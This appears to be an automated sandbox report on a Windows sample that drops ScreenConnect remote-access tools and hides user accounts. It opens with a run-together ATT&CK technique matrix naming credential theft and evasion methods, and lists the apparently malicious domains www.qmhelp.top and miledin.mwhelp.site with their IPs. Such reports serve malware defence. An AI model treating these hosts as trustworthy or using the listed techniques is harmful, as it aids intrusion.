                  DLL Side-Loading                  		LSA Secrets1
                  Process Discovery                  		SSHKeylogging3
                  Application Layer Protocol                  		Scheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                  DLL Search Order Hijacking                  		Cached Domain Credentials41
                  Virtualization/Sandbox Evasion                  		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                  Masquerading                  		DCSync1
                  Application Window Discovery                  		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                  Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                  Modify Registry                  		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                  Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt41
                  Virtualization/Sandbox Evasion                  		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                  IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron12
                  Process Injection                  		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                  Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd1
                  Hidden Users                  		Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
                  Gather Victim Org InformationDNS ServerCompromise Software Supply ChainWindows Command ShellScheduled TaskScheduled Task1
                  Bootkit                  		KeyloggingProcess DiscoveryTaint Shared ContentScreen CaptureDNSExfiltration Over Physical MediumResource Hijacking

                  Behavior Graph

                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1638477 Sample: SecuriteInfo.com.W32.Lolbas... Startdate: 14/03/2025 Architecture: WINDOWS Score: 54 35 www.qmhelp.top 2->35 37 miledin.mwhelp.site 2->37 39 bg.microsoft.map.fastly.net 2->39 45 Multi AV Scanner detection for submitted file 2->45 47 .NET source code references suspicious native API functions 2->47 49 Detected potential unwanted application 2->49 51 2 other signatures 2->51 10 SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exe 2 2->10         started        signatures3 process4 process5 12 dfsvc.exe 125 108 10->12         started        16 WerFault.exe 22 16 10->16         started        dnsIp6 43 www.qmhelp.top 104.21.72.99, 443, 49684, 49686 CLOUDFLARENETUS United States 12->43 27 C:\...\ScreenConnect.WindowsFileManager.exe, PE32 12->27 dropped 29 C:\Users\...\ScreenConnect.WindowsClient.exe, PE32 12->29 dropped 31 ScreenConnect.WindowsBackstageShell.exe, PE32 12->31 dropped 33 13 other files (none is malicious) 12->33 dropped 18 ScreenConnect.WindowsClient.exe 19 11 12->18         started        file7 process8 dnsIp9 41 miledin.mwhelp.site 62.182.86.171, 49714, 8880 YANINA-ASUA Ukraine 18->41 53 Contains functionality to hide user accounts 18->53 22 ScreenConnect.ClientService.exe 2 2 18->22         started        signatures10 process11 signatures12 55 Contains functionality to hide user accounts 22->55 57 Reads the Security eventlog 22->57 59 Reads the System eventlog 22->59 25 WerFault.exe 22->25         started        process13

                  Screenshots

                  Thumbnails

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.